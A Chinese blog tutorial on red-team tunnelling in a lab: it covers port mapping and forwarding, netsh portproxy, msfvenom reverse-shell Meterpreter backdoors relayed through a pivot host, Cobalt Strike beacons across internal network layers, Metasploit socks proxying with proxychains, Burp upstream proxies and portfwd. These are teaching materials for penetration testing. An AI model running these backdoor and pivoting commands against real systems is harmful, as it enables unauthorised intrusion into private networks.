红蓝对抗之隧道技术第一篇(内网穿透、端口映射&端口转发、Netsh端口转发、CS正反向连接多层内网、Burp设置上游代理访问内网、MSF protfwd端口转发/重定向)

最新推荐文章于 2024-06-14 08:15:00 发布
最新推荐文章于 2024-06-14 08:15:00 发布
阅读量2.5k 收藏 33
点赞数 5
分类专栏: # 内网&提权&红蓝对抗 文章标签: 网络 安全 内网安全 运维 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/q20010619/article/details/122025543
版权

文章目录

隧道应用

image-20211217203519224
在进行内网渗透时,由于外网主机无法直接连接内网主机,所以需要使用隧道技术来搭建连接通道访问内网主机即内网穿透,先来了解下几种转发技术

端口映射&端口转发

image-20211218102443438

  • 端口映射

    是指将一台主机的内网(LAN)IP 地址映射成一个公网(WAN)IP 地址,当用户访问提供映射端口主机的某个端口时,服务器将请求转移到本地局域网内部提供这种特定服务的主机;利用端口映射功能还可以将一台外网 IP 地址机器的多个端口映射到内网不同机器上的不同端口,可以实现内网穿透

    例子:

    我们在内网中有一台Web服务器,但是外网中的用户是没有办法直接访问该服务器的。于是我们可以在路由器上设置一个端口映射,只要外网用户访问路由器ip的80端口,那么路由器会把自动把流量转到内网Web服务器的80端口上。并且,在路由器上还存在一个Session,当内网服务器返回数据给路由器时,路由器能准确的将消息发送给外网请求用户的主机。在这过程中,路由器充当了一个反向代理的作用,他保护了内网中主机的安全

  • 端口转发

    有时被叫做隧道,是安全壳(SSH) 为网络安全通信使用的一种方法

    例子:

    假如我们内网现在有100台主机,那么我们现在都是通过路由器的这一个公网IP和外网通信的。那么,当互联网上的消息发送回来时,路由器是怎么知道这个消息是给他的,而另外消息是给你的呢?这就要我们的ip地址和路由器的端口进行绑定了,这时,在路由器中就会有一个内网ip和路由器端口对应的一张表。当路由器的10000端口收到消息时,就知道把消息发送给他,而当20000端口收到消息时,就知道把消息发送给你。这就是端口转发,其转发一个端口收到的流量,给另一个主机

  • 端口映射与端口转发

    用于发布防火墙内部的服务器或者防火墙内部的客户端计算机,有的路由器也有端口映射与端口转发功能。端口映射与端口转发实现的功能类似,但又不完全一样。端口映射是将外网的一个端口完全映射给内网一个地址的指定端口,而端口转发是将发往外网的一个端口的通信完全转发给内网一个地址的指定端口。端口映射可以实现外网到内网和内网到外网双向的通信(即需要配置两端机器),而映射转发只能实现外网到内网的单向通信(只需要配置转发端及机器)

参考链接:百度文库知乎

Netsh端口转发

netsh(亦称网络壳层)是一个存在于自微软Windows 2000开始的所有Windows NT系列中的命令行工具。它允许本地或远程配置网络设备,例如硬件接口

环境描述

image-20211218105453896

在内网主机上 80 端口是 WEB 服务,现在想要 kali 能访问内网主机的 80 端口上的内容,因为不在同一个网段攻击者 kali 不能直接访问内网主机而且内网主机不能直接出网,但是攻击者可以直接访问跳板机且跳板机可以访问内网主机,我们只需要在跳板机上使用 netsh 命令设置端口转发即可

命令如下

netsh interface portproxy add v4tov4 listenport=设置的端口 connectaddress=B 服务
器(ip) connectport=端口

# netsh interface portproxy add v4tov4 listenport=8080 connectaddress=10.0.0.2 connectport=80

image-20211218113853888

执行命令后攻击者可以直接访问跳板机的8080端口

image-20211218114048814

跳板机可以使用命令查看所有转发

netsh interface portproxy show all

image-20211218114154824

删除规则

# 全部
netsh interface portproxy reset
# 清除规则指定规则
netsh interface portproxy delete v4tov4 listenport=8080

在设置端口转发后可以使用 burp 直接抓包(这里我使用的是burp自带的浏览器)

image-20211219131333442

Netsh端口转发meterpreter

image-20211219102146995

在跳板机上可以通过设置代理访问内网主机,如果拿到内网主机的权限 通常是生成正向的后门,然后 kali 的 msf 可以正向连接内网主机,由此得到 meterpreter,进而进行其他操作。如果内网主机上有防火墙拦截,kali 的 msf 不能正向连接上后门,为解决这个问题,可以通过生成一个反向后门连接到跳板机上,在跳板机上再通过端口映射或者转发给 kali 的 msf 上

  1. 攻击者使用 msf 生成反弹 shell 后门

    msfvenom -p windows/meterpreter/reverse_tcp lhost=10.0.0.3 lport=8080 -f exe >r.exe
# 这里的IP端口均为跳板机

  2. 在跳板机上增加端口转发命令,将8080端口流量转发至攻击者IP 8080端口

    netsh interface portproxy add v4tov4 listenport=8080 connectaddress=192.168.179.134 connectport=8080

    image-20211219102526100

  3. 在 kali 上设置监听

    use windows/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.179.134
set lport 8080

  4. 在受害者内网主机上执行后门文件

    image-20211219103408144

CS正向连接多层内网

image-20211219104515114

首先跳板机上已经有了 cs 的后门,通过后门查看网络信息发现存在 10.0.0.0/24 网段,跳板机拥有双网卡是可以访问内网主机的,所以在 CS 中可以通过跳板机访问内网主机

image-20211219105149497

  1. 生成监听器,选择 Beacon TCP

    image-20211219105420521

  2. 生成后门 windows executable(s)

    image-20211219105544261

    将后门复制到内网主机上并执行

  3. 在 cs 中进入会话 beacon,使用命令连接内网主机

    connect 10.0.0.2 4444

    image-20211219105910005

CS反向连接多层内网

使用正向连接很可能因为内网防火墙的存在遭到拦截而连接失败,此时可以使用反向连接突破防火墙的拦截

image-20211219125408863

  1. 在选择做代理的会话选择 listerner,即跳板机的会话

    image-20211219125525783

    新建监听器

    image-20211219125553591

    image-20211219125623822

  2. 创建后门

    image-20211219125741498

    选择带有 s 的选项,在 listener 选择刚刚创建的监听器

    image-20211219125804337

  3. 在内网主机上执行后门

    执行后,后门会主动连接到跳板机,cs 即会上线

    image-20211219130023717

Burp设置上游代理访问内网

在 netsh 端口转发后可以直接使用 burp 抓包,但是对于内网横向渗透时会遇到局限性,如下环境

image-20211219140456724

当 kali 获得服务器 B 得 meterperter 后,可以通过设置 socks4 代理通过在 A 服务器上配置 proxychains 能让 D 访问 C 服务器的 80 端口

当 D 设置浏览器代理,访问 C 的时候 实际上是 D 通过代理访问 A 的 1080 端口转发到 C 的 80 端口上。因为浏览器已经设置代理了,burpsuite 无法再使用浏览器代理,在这种情况下,bursuite 要想使用浏览器代理抓包,可以在 burpsuite 代理模块指定代理 A 的代理信息,但是 burpsuite 不支持 socks4 代理。可以考虑使用 burpsuite 的上游代理设置为系统代理,再通过代理访问 kali 再经过 B 服务器即可访问 C 的 80 端口 整个流程如图

image-20211219141026715

  1. 跳板机B上线 msf

    生成后门,复制到跳板机执行

    msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.179.134 lport=8080 -f exe >r.exe

    msf 设置监听上线

    use windows/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.179.134
set lport 8080
run

  2. 信息收集,发现10段网络

    # 查看路由表
meterpreter > routes
run autoroute -p

    image-20211219142204329

    检测内网存活主机

    # 通过ping命令
run post/multi/gather/ping_sweep RHOSTS=10.0.0.0/24
# 通过arp协议
run post/windows/gather/arp_scanner RHOSTS=10.0.0.0/24
# 使用info查看模块信息
info post/multi/gather/ping_sweep

    image-20211219142330317

  3. 添加路由,进行nmap扫描

    run autoroute -s 10.0.0.0/24

    image-20211219142544827

    meterpreter > background 
msf5 exploit(multi/handler) > use auxiliary/server/socks4a  
msf5 auxiliary(server/socks4a) > run

    image-20211219142920744

    修改配置文件

    sudo vim /etc/proxychains.conf
在文本最后加上代理服务器地址,如果有用户名和密码也加上

    image-20211219144408878

    测试

    proxychains nmap -sT -Pn 10.0.0.2 -p 80
# 这里能访问10.0.0.2是因为在msf中设置了路由

    image-20211219144738595

这样设置代理后 A 攻击者就可以通过 B 跳板机访问 C 内网主机

image-20211219145230097

接下来要解决的问题就是让 D 能通过 A 的代理访问 C

在主机 D 浏览器中添加代理,火狐可以在设置中设置,我这里使用插件

image-20211219145612462

这样主机 D 就可以通过代理访问到内网主机 C

image-20211219145739365

最后一个问题主机 D 使用代理,开始也是说了现在浏览中已经设置了代理不能再设置 burp 的流量了,通过 burp 中的上游代理功能来解决,Burp 中利用了两种代理方式,但是 socks 代理只支持 socks5,所以本次使用 Upstream Proxy Servers

image-20211219150329709

设置上游代理的方法

使用代理工具 Proxifier 或者 SocksCap工具,我这里使用的是 SocksCap,SocksCap 系统代理的默认端口为25378(代理类型socks4)

image-20211219152446884

右击屏幕右下角的工具图标选择系统代理

image-20211219152751105

Burp 中添加代理

image-20211219152844274

设置后成功访问10.0.0.2,这样设置不会影响主机其他应用联网

image-20211219153105958

使用 proxifier 也可以,需要设置代理规则,不设置的话只能访问代理,影响其他流量

image-20211219151109435

MSF protfwd端口转发/重定向

Meterpreter shell 中的 portfwd 命令最常用作端口转发,允许直接访问攻击系统无法访问的机器。在可以访问攻击者和目标网络(或系统)的受损主机上运行此命令,我们可以实质上通过本机转发 TCP 连接,从而使其成为一个支点。就像使用 ssh 连接的端口转发技术一样,portfwd 将中继与连接的机器之间的 TCP 连接,效果等同于使用 netsh

image-20211219160343129

先拿到跳板机 meterpreter,

meterpreter > portfwd -h
Usage: portfwd [-h] [add | delete | list | flush] [args]

OPTIONS:

    -L <opt>  Forward: local host to listen on (optional). Reverse: local host to connect to.
    -R        Indicates a reverse port forward.
    -h        Help banner.
    -i <opt>  Index of the port forward entry to interact with (see the "list" command).
    -l <opt>  Forward: local port to listen on. Reverse: local port to connect to.
    -p <opt>  Forward: remote port to connect to. Reverse: remote port to listen on.
    -r <opt>  Forward: remote host to connect to

使用 add 命令添加端口转发

portfwd add -l 8080 -r 10.0.0.2 -p 80

设置之后访问攻击者的 8080 端口就相当于访问内网主机的 80 端口

image-20211219160650738

推荐阅读

OceanSec
关注
  • 5
    点赞
  • 33
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
端口转发端口映射
谢公子的博客
11-27 3万+
目录 端口转发端口映射 两者的区别 端口转发端口映射 介绍端口转发端口映射之前先了解两个概念:正向连接和反向连接 正向连接:你的机器连接目标机器 反向连接:目标机器反连你的机器 端口映射端口映射就是将内网中的主机的一个端口映射到外网主机的一个端口,提供相应的服务。当用户访问外网IP的这个端口时,服务器自动将请求映射到对应局域网内部的机器上。比如,我们在内网中有一台Web服务...
使用proxychains代理流量转发至burp
q
12-21 479
有时候使用exp脚本,不知道流量数据包是什么样的,需要抓包看看数据包。秃子教过在windows下使用Proxifier代理工具进行流量转发至burp,举一反三。kali自带了proxychains,编辑文件,注释掉socks4,添加本机真实ip,不能写127.0.0.1记住端口后面设置burp端口需要一致。就正常执行exp的前提上加上proxychains4。在burp代理添加上代理ip。在burp上成功捕获流量。
内网穿透方法有哪些?路由器端口映射外网和软件方案步骤
最新发布
asdaddsd的博客
06-14 1900
在“服务端口号”后面填写自己实际应用使用端口号---->在“ip地址”后面填写自己电脑本地固定不变的内网IP地址---->协议选择“TCP”(如是UDP应用则选择UDP,其他协议和多协议应用则选择ALL)---->状态后面选择“生效”---->点击“保存”。这适用于本地有路由器权限,且有公网IP的网络环境。在浏览器里面输入192.168.1.1(TP-Link路由器默认管理地址,输入用户名和密码(默认都是admin,其余有些路由器用户名和密码在路由器背面)---->按回车键---->点击“确定”进行登陆。
内网穿透端口转发
lionwerson的博客
12-09 2787
1.在后渗透阶段,如果我们拿下了一台服务器的权限,发现在服务器所属的内网中有一台开启了3389或者22端口的主机,但是无法直接连接,是因为目标服务器处在内网中或者没有联网,这个时候我们可以借助内网中另一台可以联网的服务器来作为代理服务器与连接开启3389的服务器进行连接。 2.实验环境: 系统 用户 桥接 192.168.0.0/24 NAT 192.168.11.0/24 win10 管理员 192.168.0.16 ubuntu1 lion1
端口转发及穿透内网
qq_45751902的博客
11-02 1667
删除指定的端口转发规则 netsh interface portproxy delete v4tov4 listenport=3340 listenaddress=10.1.1.110。connectport – 一个TCP端口,来自listenport的连接会被转发到该端口 显示系统中的转发规则列表。显示系统中的转发规则列表netsh interface portproxy show all。清除所有当前的端口转发规则 netsh interface portproxy reset。
内网穿透学习
我的博客
05-31 783
问题 本地项目如何让别人访问? 解决 为了让本地项目可以让别人使用,我们可以通过内网穿透来解决这个问题。 方法一 Utools 工具实现内网穿透 工具下载地址:https://www.u.tools/ 操作步骤 下载安装之后,在插件中心找到内网穿透插件下载安装,在已安装处打开内网穿透,点击进入选择输入相关参数后点击连接即可实现内网穿透,点击复制网址,即可让别人访问方法二 Ngrok实现内网穿透 找到如下工具,进入之后注册账户,点击隧道管理开通隧道,在这里可...
利用SSH端口转发内网穿透
徐先森的博客
05-13 2960
利用SSH端口转发内网穿透
netsh端口转发可视化操作工具
03-05
本工具基于windows自带的netsh用winform开发的端口转发部署工具,可进行单条的插入删除和批量按顺序的插入和删除。桌面操作,免去了cmd敲命令行的麻烦。
易语言端口转发
08-21
易语言端口转发源码系统结构:置数据,回调函数,转发线程,客户进入离开,进入列表,审核IP,检查黑名单,删除过期记录,取连接次数, ======窗口集1 || ||------_窗口1_创建完毕 || ||------_按钮3_被
Windows自带的端口转发工具netsh使用方法
09-22
微软Windows的netsh是一个命令行脚本实用工具。使用netsh工具 ,可以查看或更改本地计算机或远程计算机的网络配置。不仅可以在本地计算机上运行这些命令,而且可以在网络上的远程计算机上运行。
Windows netsh 命令实现端口转发端口映射)-易语言
06-14
有时候不想暴露真实服务器IP和端口,所以就借用了端口转发软件。翻遍市面上源码,大都是需要运行着软件才能工作,这些软件并发性能不高,可能堵塞,数据丢失,崩溃情况。 最后发现windows 本身就支持端口转发,执行...
Python 实现 WSL 2 自动 Windows 主机IP和端口转发,可远程 SSH 登录和访问
12-21
使用Python或其他工具(如`netsh`或` socat`),配置端口转发规则,将Windows上的指定端口转发到WSL 2的对应端口,从而实现SSH连接。 5. **处理端口冲突**: 如果Windows上已经安装了SSH服务器服务,可能会与WSL...
端口反向映射、正向转发
xiazhengwei1994的博客
09-18 371
内网机 ssh -NCfR 0.0.0.0:8080:localhost:1521 root@10.30.43.100 将本地端口1521 映射到10.30.43.100 的8080端口 外网机 ssh -fCNL *:10000:localhost:8080 localhost 将 本地的8080 转发到10000
常用的Linux命令和技巧 ,正向反向端口转发(工作中总结)
瞎几波写
11-27 986
1 端口转发 ssh -L{PC端口号}:localhost:{数据库端端口号} root@{服务器IP地址} 工作中遇到如下需求, 服务器1 服务器2 windows开发机 服务器1和服务器2互相之间不能直接访问,但是windows可以访问服务器1和服务器2 如果我们需要从服务器1访问服务器2,我们需要建立端口转发,将windows作为中介,数据流大致是这样的: 服务器1=&gt...
一文了解端口转发
热门推荐
weixin_44255856的博客
08-19 1万+
内网端口转发 应用场景:当你拿到一个网站的shell,然后提权,以及各种的一些操作,当你想开启目标服务器的远程桌面时,然而他却处于内网的服务器中,有什么办法实现呢? 这里就要运用到端口转发了。 端口转发技术,用于允许外部备使用私人电脑服务网络。 对于防火墙禁止访问某些端口的问题,比如3389端口,我们可以将利用机器的3000端口做端口转发,从外界接受数据,转发给本机的3389端口,从而绕过防火...
第二周渗透测试靶场实践
张子悦^^的博客
10-12 367
第二周渗透测试靶场实践信息收集扫描端口漏洞利用phpMyadminyxcms后渗透域内信息收集反弹shell提权利用csmsf联动设置代理cs的准备工作系统信息收集主机密码收集cs读内存cs读注册表密码利用cs设置代理msf配置代理添加路由msf扫描内网主机内网信息收集获取内网主机权限窃取Token总结 信息收集 扫描端口 靶场地址:10.203.87.175 nmap -sS -sV -A 10.203.87.175 开了80端口,浏览器打开 发现备份文件,点击备份文件,解压 打开每
ssh反向连接和简单实现 转http://www.broncho.cn/forum/viewtopic.php?p=1116
fjfdszj的专栏
12-22 2788
ssh反向连接和简单实现<br />由 lyb 于 2008-11-23 13:40 1<br /> 知识浅薄,欢迎指正。 LYB 2008.11.23<br /><br />最近想在家里登录公司的机器查看代码,期间碰到了一些问题,因为公司里的机器是没有对外IP的,而且请网管<br />做个端口映射也比较麻烦,所以在家里不能直接连接到公司的机器上。在网上搜索了一下,找到了ssh反向连接这<br />个解决方法,成功解决了不能直接连接的问题,并对反向连接的实现感兴趣,按照自己的想法,写了一个简单的示<br
内网渗透笔记-端口转发内网代理
pyphrb的博客
07-28 9123
0x01 内网代理和转发1.1 正向代理(Forward Proxy)Lhost--》proxy--》Rhost Lhost为了访问到Rhost,向proxy发送了一个请求并且指定目标是Rhost,然后proxy向Rhost转交请求并将获得的内容返回给Lhost,简单来说正向代理就是proxy代替了我们去访问Rhost。1.2 反向代理(reverse proxy)Lhost<--->proxy<-
端口经常被攻击怎么办
athena1999的博客
01-31 248
5.及时更新软件和补丁:及时更新系统和应用程序的补丁和安全更新,以修复已知的安全漏洞。1.关闭不必要的端口:只打开必要的端口,避免打开不必要的端口,以减少潜在的安全风险。3.定期检查系统日志:定期检查系统日志以发现异常流量和异常行为,及时处理安全事件。4.使用安全的密码策略:设置复杂的密码并定期更换密码,以避免密码猜测攻击。2.使用防火墙:在服务器上安装防火墙并配置安全规则,以限制对端口的访问。端口经常被攻击怎么办。
windows端口转发
07-28
Windows端口转发是一种功能,可以将传入的网络连接从一个端口转发到另一个端口。在Windows系统中,可以使用netsh命令来管理端口转发规则。要查看当前存在的端口转发规则,可以使用以下命令:netsh interface ...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

OceanSec

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值